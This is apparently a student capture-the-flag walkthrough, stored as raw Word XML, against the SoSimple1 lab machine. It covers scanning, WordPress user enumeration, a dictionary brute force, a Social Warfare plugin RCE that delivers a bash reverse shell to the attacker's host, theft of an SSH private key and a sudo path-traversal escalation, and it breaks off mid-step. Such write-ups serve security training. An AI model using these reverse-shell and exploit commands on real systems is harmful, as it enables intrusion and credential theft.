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9616D" w14:textId="52423B93" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E04">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="18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Capture the Flag Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6FE788" w14:textId="6DB5279A" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E04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Reconnaissance (35%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1229FE" w14:textId="1ECB9F1E" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Scanning target machine for open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41193308" w14:textId="3F585EA9" w:rsidR="00803C73" w:rsidRPr="00104383" w:rsidRDefault="00803C73" w:rsidP="00151F84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Turn on SoSimple1 Virtual Box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DB1CCF" wp14:editId="36784769">
            <wp:extent cx="4775200" cy="3560483"/>
            <wp:effectExtent l="0" t="0" r="635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8569" cy="3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593A" w14:textId="0BB5B35F" w:rsidR="00803C73" w:rsidRPr="00104383" w:rsidRDefault="00803C73" w:rsidP="00151F84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Take note that the target machine IP is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192.168.1.204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A40CD5" w14:textId="0C3AA6AF" w:rsidR="00151F84" w:rsidRPr="00104383" w:rsidRDefault="00151F84" w:rsidP="00151F84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Turn on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Kali Linux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8F8CE8" wp14:editId="04966781">
            <wp:extent cx="2143125" cy="368596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9866" cy="3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327C" w14:textId="5717BE32" w:rsidR="00151F84" w:rsidRPr="00104383" w:rsidRDefault="00151F84" w:rsidP="00151F84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Open </w:t>
      </w:r>
      <w:r w:rsidR="009F772F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terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00104383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="009F772F" w:rsidRPr="00104383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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E86845" wp14:editId="31773EDE">
            <wp:extent cx="4864100" cy="3904272"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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818" cy="39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E181" w14:textId="0538E9A5" w:rsidR="00151F84" w:rsidRPr="00104383" w:rsidRDefault="009F772F" w:rsidP="00151F84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On the terminal, u</w:t>
      </w:r>
      <w:r w:rsidR="00151F84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command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00151F84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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00151F84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-p- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00151F84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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00151F84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192.168.1.204</w:t>
      </w:r>
      <w:r w:rsidR="00803C73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03C73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to scan the target machine using the “Nmap” tool.</w:t>
      </w:r>
      <w:r w:rsidR="00F3244F"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F0B256" wp14:editId="5D6C81CF">
            <wp:extent cx="5562600" cy="264936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627" cy="26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84EC" w14:textId="0A3188C8" w:rsidR="00F3244F" w:rsidRPr="00104383" w:rsidRDefault="00F3244F" w:rsidP="00151F84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Found 2 </w:t>
      </w:r>
      <w:proofErr w:type="gram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open  ports</w:t>
      </w:r>
      <w:proofErr w:type="gram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590B98" w14:textId="1F403135" w:rsidR="00F3244F" w:rsidRPr="00104383" w:rsidRDefault="00F3244F" w:rsidP="00F3244F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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22/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tcp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: used for SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246615D9" w14:textId="0E03F083" w:rsidR="00151F84" w:rsidRPr="00104383" w:rsidRDefault="00F3244F" w:rsidP="00151F84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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80/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tcp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: used for HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00FD3A01"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3CFEE" wp14:editId="1C59C32E">
            <wp:extent cx="5168900" cy="4263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619" cy="4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CA18" w14:textId="482E77E1" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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lastRenderedPageBreak/>
        <w:t>Enumerating the applications running on the target machine and accessing them through a browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1349666A" w14:textId="43EA2745" w:rsidR="00FD3A01" w:rsidRPr="00104383" w:rsidRDefault="009F772F" w:rsidP="00FD3A01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the terminal, use command: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dirb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hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00104383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http://192.168.1.204</w:t>
        </w:r>
      </w:hyperlink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9430A9" wp14:editId="59A2B251">
            <wp:extent cx="3282950" cy="263723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133" cy="26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D7C3" w14:textId="1D61B605" w:rsidR="009F772F" w:rsidRPr="00104383" w:rsidRDefault="00195CB9" w:rsidP="00FD3A01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Right click on the directory link </w:t>
      </w:r>
      <w:proofErr w:type="gram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and  click</w:t>
      </w:r>
      <w:proofErr w:type="gram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open link.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B0C5A8" wp14:editId="75C18D96">
            <wp:extent cx="4806950" cy="45707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482" cy="45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A17A" w14:textId="023A9B34" w:rsidR="00195CB9" w:rsidRPr="00104383" w:rsidRDefault="00195CB9" w:rsidP="00FD3A01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wordpress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browser will open.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7258254" wp14:editId="31BC71FD">
            <wp:extent cx="3574463" cy="2913035"/>
            <wp:effectExtent l="0" t="0" r="6985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966" cy="292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C5DF" w14:textId="2639158C" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Enumerating valid users of the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA342F" w14:textId="77777777" w:rsidR="0004327E" w:rsidRPr="00104383" w:rsidRDefault="0004327E" w:rsidP="0004327E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WPScan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tool to enumerate the website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0C9D0" w14:textId="72D5F692" w:rsidR="0004327E" w:rsidRPr="00104383" w:rsidRDefault="0004327E" w:rsidP="0004327E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the terminal, use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wpscan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url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“</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00104383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http://192.168.1.204</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002424C1" w:rsidRPr="00104383">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/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="002424C1" w:rsidRPr="00104383">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wordpress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” -enumerate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5DA054A" wp14:editId="3809BA9B">
            <wp:extent cx="5187950" cy="37357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221" cy="3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6D4E" w14:textId="45851C69" w:rsidR="0004327E" w:rsidRPr="00104383" w:rsidRDefault="002424C1" w:rsidP="0004327E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Identified </w:t>
      </w:r>
      <w:r w:rsidR="00952CE1" w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>valid users.</w:t>
      </w:r>
      <w:r w:rsidR="0004327E"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52CE1" w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Admin and max</w:t>
      </w:r>
      <w:r w:rsidR="0004327E" w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0076469F" w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> But no password.</w:t>
      </w:r>
      <w:r w:rsidR="0004327E"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96B0E" wp14:editId="0D153554">
            <wp:extent cx="5060950" cy="2501818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0899" cy="25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DCF8" w14:textId="3F2B61F2" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Attempting to brute force the password for a valid user through a dictionary attack available in Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB5F003" w14:textId="28C83FEF" w:rsidR="00B23F3A" w:rsidRPr="00104383" w:rsidRDefault="00B23F3A" w:rsidP="00B23F3A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Locate the </w:t>
      </w:r>
      <w:r w:rsidR="009131F5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Kali Linux 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dictionary attack wordlist file </w:t>
      </w:r>
      <w:r w:rsidR="009131F5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</w:t>
      </w:r>
      <w:r w:rsidR="00F804FD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opening file system -&gt; open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F804FD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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F804FD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folder -&gt; open share folder -&gt; open wordlists </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C431313" w14:textId="503C51E7" w:rsidR="00B23F3A" w:rsidRPr="00104383" w:rsidRDefault="00F804FD" w:rsidP="00B23F3A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1EE728" wp14:editId="494042FB">
            <wp:extent cx="4114800" cy="18125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955" cy="1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6A35" w14:textId="0296A08C" w:rsidR="00B23F3A" w:rsidRPr="00104383" w:rsidRDefault="00B23F3A" w:rsidP="00B23F3A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Here we find the file </w:t>
      </w:r>
      <w:proofErr w:type="gram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usr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/share/wordlists/rockyou.txt.gz ;</w:t>
      </w:r>
      <w:proofErr w:type="gram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is a zipped file so we need to unzip it</w:t>
      </w:r>
      <w:r w:rsidR="00F804FD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Rick click </w:t>
      </w:r>
      <w:r w:rsidR="00F804FD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rockyou.txt.gz</w:t>
      </w:r>
      <w:r w:rsidR="00F804FD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click </w:t>
      </w:r>
      <w:r w:rsidR="00F804FD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extract</w:t>
      </w:r>
      <w:r w:rsidR="00F804FD" w:rsidRPr="0010438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799D5D3" wp14:editId="77BF8F39">
            <wp:extent cx="3197892" cy="23666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4662" cy="237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26A1" w14:textId="34EC05F8" w:rsidR="00F804FD" w:rsidRPr="00104383" w:rsidRDefault="007A3815" w:rsidP="00595A30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Extraction will not perform due to not having the right permissions.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2723A6" wp14:editId="212C209E">
            <wp:extent cx="3797300" cy="888065"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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231" cy="8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F4F2" w14:textId="61F472FC" w:rsidR="007A3815" w:rsidRPr="00104383" w:rsidRDefault="007A3815" w:rsidP="007A3815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Drag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rockyou.txt.gz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desktop since root user has permission to extract. Now that the file is extracted it will become a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rockyou.txt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file.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97E5957" wp14:editId="088876C8">
            <wp:extent cx="2616200" cy="11508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3699" cy="11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4C10" w14:textId="1D65083D" w:rsidR="00595A30" w:rsidRPr="00104383" w:rsidRDefault="007A3815" w:rsidP="00595A30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Open terminal and u</w:t>
      </w:r>
      <w:r w:rsidR="00952CE1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command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00952CE1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wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00952CE1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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00952CE1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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00952CE1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hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00952CE1" w:rsidRPr="00104383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http://192.168.1.204/wordpress/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00952CE1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-U max -P </w:t>
      </w:r>
      <w:r w:rsidR="00837A44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~</w:t>
      </w:r>
      <w:r w:rsidR="00952CE1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r w:rsidR="00837A44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Desktop/</w:t>
      </w:r>
      <w:r w:rsidR="00952CE1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rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="003E4CE4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57184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to brute force the user “max”</w:t>
      </w:r>
      <w:r w:rsidR="00837A44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37A44"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F9C04F" wp14:editId="67FD5F27">
            <wp:extent cx="5518150" cy="548278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559" cy="54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D8F1" w14:textId="500456E7" w:rsidR="00837A44" w:rsidRPr="00104383" w:rsidRDefault="00837A44" w:rsidP="00595A30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have found a valid combination.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Username: max, </w:t>
      </w:r>
      <w:proofErr w:type="gram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Password:</w:t>
      </w:r>
      <w:proofErr w:type="gram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forgot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86AAAB" wp14:editId="04FD1A2F">
            <wp:extent cx="3956050" cy="1869825"/>
            <wp:effectExtent l="0" t="0" r="635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4415" cy="18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362" w14:textId="77777777" w:rsidR="003E4CE4" w:rsidRPr="00104383" w:rsidRDefault="003E4CE4" w:rsidP="00F804F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CD1F62" w14:textId="30C0C132" w:rsidR="00C806BB" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00C806BB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Logging in to the application with username and password obtained from steps 3 and 4.</w:t>
      </w:r>
      <w:r w:rsidR="00C806BB"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</w:p>
    <w:p w14:paraId="6DC05887" w14:textId="6127C5DB" w:rsidR="00C806BB" w:rsidRPr="00104383" w:rsidRDefault="00C806BB" w:rsidP="00C806BB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Open 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firefox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type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192.168.1.204/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wordpress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/wp-admin/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go to login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDE4949" w14:textId="368BD7A6" w:rsidR="00C806BB" w:rsidRPr="00104383" w:rsidRDefault="00C806BB" w:rsidP="00C806BB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Type the username</w:t>
      </w:r>
      <w:r w:rsidR="002411B3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gramStart"/>
      <w:r w:rsidR="002411B3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max</w:t>
      </w:r>
      <w:r w:rsidR="002411B3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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002411B3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password: </w:t>
      </w:r>
      <w:r w:rsidR="002411B3"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forgot</w:t>
      </w:r>
      <w:r w:rsidR="002411B3"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A1C30B" wp14:editId="1BCA2F78">
            <wp:extent cx="3441700" cy="2137090"/>
            <wp:effectExtent l="0" t="0" r="635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7519" cy="21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D8F7" w14:textId="2554515A" w:rsidR="002411B3" w:rsidRPr="00104383" w:rsidRDefault="002411B3" w:rsidP="00C806BB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Now you are inside max’s profile.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EC19E39" wp14:editId="799858BA">
            <wp:extent cx="3924300" cy="289752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416" cy="29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7265" w14:textId="321BF9E8" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Finding an application outdated plugin (exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764EF4B2" w14:textId="57790D1C" w:rsidR="00790670" w:rsidRPr="00104383" w:rsidRDefault="00790670" w:rsidP="00790670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found some vulnerable plugins during the enumeration, so </w:t>
      </w:r>
      <w:proofErr w:type="gram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lets</w:t>
      </w:r>
      <w:proofErr w:type="gram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pinpoint those flaws. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8BE44" w14:textId="16AE168B" w:rsidR="001A479E" w:rsidRPr="00104383" w:rsidRDefault="001A479E" w:rsidP="00790670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>Simple Cat Solution plugin is outdated</w:t>
      </w:r>
      <w:r w:rsidR="00E92D9A" w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is vulnerable to Arbitrary File Upload exploit.</w:t>
      </w:r>
      <w:r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79B50" wp14:editId="39F9E1D4">
            <wp:extent cx="4959350" cy="1053331"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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5060" cy="10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6E3F" w14:textId="079AC120" w:rsidR="001A479E" w:rsidRPr="00104383" w:rsidRDefault="001A479E" w:rsidP="001A479E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Social Warfare is outdated and is vulnerable to a Remote Code </w:t>
      </w:r>
      <w:r w:rsidR="008D2150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xecution exploit.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D2150"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FADDC" wp14:editId="6351ACF2">
            <wp:extent cx="4927898" cy="1583140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633" cy="15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4FE6" w14:textId="77777777" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E04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Exploitation (30%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66632822" w14:textId="6440E7C5" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Leveraging the exploit to get shell access to the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29087005" w14:textId="03656860" w:rsidR="00C2541F" w:rsidRPr="00104383" w:rsidRDefault="00E50189" w:rsidP="00C2541F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We will be exploiting the Social Warfare plugin using a Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="0040211B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Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="0040211B" w:rsidRPr="0010438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www.exploit-db.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0040211B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. Type social warfare on search bar.</w:t>
      </w:r>
      <w:r w:rsidR="0040211B"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0211B"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374881" wp14:editId="7502B1A1">
            <wp:extent cx="2730107" cy="25463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2941" cy="254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DA27" w14:textId="7615FAAA" w:rsidR="0040211B" w:rsidRPr="00104383" w:rsidRDefault="0040211B" w:rsidP="00C2541F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Open the reference link. Now you have the 3 steps (Proof of Concept) to exploit the vulnerable plugin. </w:t>
      </w:r>
      <w:r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A7C7D" wp14:editId="15DDB92F">
            <wp:extent cx="4286250" cy="17909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8767" cy="18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4D9C" w14:textId="6D11FC42" w:rsidR="0040211B" w:rsidRPr="00104383" w:rsidRDefault="0040211B" w:rsidP="00C2541F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Create payloadfile. On the terminal, use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nano simple.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00962DB2"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62DB2"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EC297" wp14:editId="10ECF224">
            <wp:extent cx="1524000" cy="350259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4689" cy="3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6075E1F" w14:textId="07113766" w:rsidR="00962DB2" w:rsidRPr="00104383" w:rsidRDefault="00962DB2" w:rsidP="00C2541F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On the file type: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&lt;pre&gt; system(“bash -c ‘bash -i &gt;&amp; /dev/tcp/192.168.1.153/4444 0&gt;&amp;1’”&lt;/pre&gt; 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*Note the IP is the kali IP, not the target IP*</w:t>
      </w:r>
      <w:r w:rsidR="00001391"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9231D" wp14:editId="7DE64C7C">
            <wp:extent cx="4305300" cy="910277"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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039" cy="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EB65" w14:textId="78B62101" w:rsidR="00001391" w:rsidRPr="00104383" w:rsidRDefault="00001391" w:rsidP="00C2541F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Create python server. Use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sudo python3 -m http.server 80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D20D0F" wp14:editId="2F700D2C">
            <wp:extent cx="3505200" cy="883041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8599" cy="8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5A38" w14:textId="2DE758CC" w:rsidR="00001391" w:rsidRPr="00104383" w:rsidRDefault="00001391" w:rsidP="00C2541F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Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="001043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http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_option&amp;swp_url=http://ATTACKER_HOST/payload.txt</w:t>
        </w:r>
      </w:hyperlink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; in our case it is </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00790C95" w:rsidRPr="00104383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http://192.168.1.204/wordpress/wp-admin/admin-post.php?swp_debug=load_option&amp;swp_url=http://192.168.1.153/simple.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01F503C1" w14:textId="34487817" w:rsidR="00001391" w:rsidRPr="00104383" w:rsidRDefault="00790C95" w:rsidP="00C2541F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Once you hit enter, something will populate on the python terminal.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A54F52" wp14:editId="196C8AF1">
            <wp:extent cx="3336823" cy="2298700"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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9997" cy="23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BD7" w14:textId="16D0F525" w:rsidR="00790C95" w:rsidRPr="00104383" w:rsidRDefault="00790C95" w:rsidP="00C2541F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 this point, we have configured the python server to listen to any incoming connections on the 4444 </w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="gram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4EDC87" w14:textId="69043376" w:rsidR="00790C95" w:rsidRPr="00104383" w:rsidRDefault="00790C95" w:rsidP="00790C95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Create new terminal. Use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nc -lvp 4444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372C54" wp14:editId="3F79690E">
            <wp:extent cx="4503009" cy="1230630"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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1307" cy="12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38B9" w14:textId="58CA2C12" w:rsidR="00972173" w:rsidRPr="00104383" w:rsidRDefault="00972173" w:rsidP="00105CDD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Refresh the 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wordpress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browser to get the command shell of the target.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20B8DB" wp14:editId="419094E3">
            <wp:extent cx="3612949" cy="2608580"/>
            <wp:effectExtent l="0" t="0" r="6985" b="127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8244" cy="261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9484" w14:textId="10BC4B0B" w:rsidR="004E41CF" w:rsidRPr="00104383" w:rsidRDefault="004E41CF" w:rsidP="00105CDD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>We are in the shell now, but we have limited access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05078AAE" w14:textId="2D33285B" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E04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Privilege Escalation (25%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FDF06" w14:textId="19EB6F1C" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Directory browsing to obtain authentication keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78124CE0" w14:textId="02C7CBDC" w:rsidR="00105CDD" w:rsidRPr="00104383" w:rsidRDefault="004E41CF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the shell terminal, use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cd /home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go to the home directory of shell.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D9DFD7" wp14:editId="09FE7B2B">
            <wp:extent cx="4889500" cy="4889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62FB" w14:textId="42B132D8" w:rsidR="004E41CF" w:rsidRPr="00104383" w:rsidRDefault="004E41CF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ls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see all the files.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8F89DC" wp14:editId="622864D5">
            <wp:extent cx="3632200" cy="1097388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5077" cy="110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5ECA" w14:textId="46BACE15" w:rsidR="004E41CF" w:rsidRPr="00104383" w:rsidRDefault="004E41CF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There are two users: max and steven. Change directory to max by using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cd max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780C31D" wp14:editId="0590FDE3">
            <wp:extent cx="5091545" cy="889000"/>
            <wp:effectExtent l="0" t="0" r="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4754" cy="8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F855" w14:textId="63678693" w:rsidR="004E41CF" w:rsidRPr="00104383" w:rsidRDefault="009F4D24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List all files under max by using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ls -a </w:t>
      </w:r>
      <w:r w:rsidRPr="0010438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3EEAF49" wp14:editId="576BF374">
            <wp:extent cx="2895942" cy="192405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8417" cy="1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A2A7" w14:textId="7C63C978" w:rsidR="009F4D24" w:rsidRPr="00104383" w:rsidRDefault="009F4D24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We need to get into the .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file. Change directory to .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using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cd .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ssh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Then use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ls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to see what files are under .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BF7566E" wp14:editId="63923E10">
            <wp:extent cx="4311650" cy="927823"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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936" cy="9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02BF" w14:textId="6E180B8A" w:rsidR="009F4D24" w:rsidRPr="00104383" w:rsidRDefault="009F4D24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The public and private key is shown under the .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file. Look at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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id_rsa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by using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cat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id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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1716FB" wp14:editId="38853A02">
            <wp:extent cx="3623371" cy="36195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7114" cy="36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ADF0" w14:textId="51E2FDAD" w:rsidR="00A57AA9" w:rsidRPr="00104383" w:rsidRDefault="00A57AA9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Open a new terminal</w:t>
      </w:r>
      <w:r w:rsidR="00104383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private key file by using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nano privatekey.txt. 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On the text file, paste the private key. Save the file.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C82C23" wp14:editId="5503CC18">
            <wp:extent cx="3530600" cy="2744513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4706" cy="27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E218" w14:textId="18C4EC48" w:rsidR="00A57AA9" w:rsidRPr="00104383" w:rsidRDefault="006D7AB0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Modify the permissions of the privatekey.txt file by using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chmod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600 privatekey.txt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5BF1B5A" wp14:editId="72935230">
            <wp:extent cx="2244723" cy="371429"/>
            <wp:effectExtent l="0" t="0" r="381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8087" cy="3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4EE9" w14:textId="4B49524E" w:rsidR="006D7AB0" w:rsidRPr="00104383" w:rsidRDefault="006D7AB0" w:rsidP="00105CDD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the private key to log in max’s </w:t>
      </w:r>
      <w:r w:rsidR="001E0504"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shell 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account. Use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ssh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privatekey.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="00104383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max@192.168.1.204</w:t>
        </w:r>
      </w:hyperlink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. *Note the IP is the target’s IP*</w:t>
      </w:r>
      <w:r w:rsidR="001E0504"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1FBAA4B" w14:textId="5FF32686" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Logging on with obtained credential info and authentication keys to enumerate user’s home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102DA048" w14:textId="77777777" w:rsidR="00104383" w:rsidRPr="00104383" w:rsidRDefault="00104383" w:rsidP="00104383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Modify the permissions of the privatekey.txt file by using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chmod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600 privatekey.txt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056B6BC" wp14:editId="09AD1501">
            <wp:extent cx="2244723" cy="371429"/>
            <wp:effectExtent l="0" t="0" r="381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8087" cy="3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D5D9" w14:textId="5C6F69BB" w:rsidR="00104383" w:rsidRPr="00104383" w:rsidRDefault="00104383" w:rsidP="00104383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Use the private key to log in max’s shell account. Use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ssh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privatekey.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="00104383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max@192.168.1.204</w:t>
        </w:r>
      </w:hyperlink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*Note the IP is the target’s IP*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6C7ED0" wp14:editId="6E2E6849">
            <wp:extent cx="4121150" cy="3771118"/>
            <wp:effectExtent l="0" t="0" r="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8185" cy="3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C76C" w14:textId="77777777" w:rsidR="00B803BB" w:rsidRPr="00104383" w:rsidRDefault="00B803BB" w:rsidP="00B803BB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max’s shell, use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-l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 Here, we see there is steven’s account.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C0B14DD" wp14:editId="702C11DD">
            <wp:extent cx="4940300" cy="86402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4762" cy="8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5C2" w14:textId="77777777" w:rsidR="00B803BB" w:rsidRPr="00104383" w:rsidRDefault="00B803BB" w:rsidP="00B803BB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-u steven /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usr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sbin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/service</w:t>
      </w:r>
      <w:proofErr w:type="gram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..</w:t>
      </w:r>
      <w:proofErr w:type="gram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/../bin/bash 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log in steven’s account.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B6323C" wp14:editId="19B217D1">
            <wp:extent cx="4806950" cy="3297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7840" cy="33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DEF" w14:textId="0B349691" w:rsidR="00B803BB" w:rsidRPr="00104383" w:rsidRDefault="00B803BB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steven’s shell, use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-l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>. Here, we see the root’s account.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48759B" wp14:editId="56D49C7D">
            <wp:extent cx="5086350" cy="710241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6979" cy="7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FE95" w14:textId="5C07B5EB" w:rsidR="00F84569" w:rsidRPr="00104383" w:rsidRDefault="00F84569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Note root’s account and its password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/opt/tools/server-health.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00104383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. We will be recreating this on steven’s shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC0D32B" w14:textId="0DFF2C01" w:rsidR="00532E04" w:rsidRPr="00104383" w:rsidRDefault="00532E04" w:rsidP="00532E0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Leveraging privilege escalation exploit to elevate to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1147E74D" w14:textId="107ECCFE" w:rsidR="00C44FC2" w:rsidRPr="00104383" w:rsidRDefault="00C44FC2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steven’s shell, use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ls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list directories. Notice there is an </w:t>
      </w:r>
      <w:r w:rsidRPr="0010438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opt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directory.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9B93F6" wp14:editId="6D2A72B0">
            <wp:extent cx="4895850" cy="32586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5303" cy="3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D3E8" w14:textId="64BA6217" w:rsidR="00C44FC2" w:rsidRPr="00104383" w:rsidRDefault="00C44FC2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Change directory to opt by using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cd opt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28F96A" wp14:editId="165F6535">
            <wp:extent cx="2514600" cy="186523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4911" cy="1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0344" w14:textId="78B3AD35" w:rsidR="00C44FC2" w:rsidRPr="00104383" w:rsidRDefault="00C44FC2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tools directory by using command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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tools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under the opt directory.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16DC23" wp14:editId="2206C4AC">
            <wp:extent cx="2942726" cy="6731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0217" cy="6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C956" w14:textId="068F12B1" w:rsidR="00C44FC2" w:rsidRPr="00104383" w:rsidRDefault="00C44FC2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Change directory to tools by using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cd tools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636CB" wp14:editId="05937F80">
            <wp:extent cx="2942590" cy="337961"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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2711" cy="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C4D4" w14:textId="5125A9BE" w:rsidR="00C44FC2" w:rsidRPr="00104383" w:rsidRDefault="00F84569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Create a file for the reverse shell command by using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touch server-health.sh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5E3AC9" wp14:editId="238219D4">
            <wp:extent cx="4419600" cy="222397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7224" cy="2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B2B2" w14:textId="4C483737" w:rsidR="00F84569" w:rsidRPr="00104383" w:rsidRDefault="00F84569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Edit the file by using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nano server-health.sh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. Inside the file, type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#!bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="00E36B33"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, </w:t>
      </w:r>
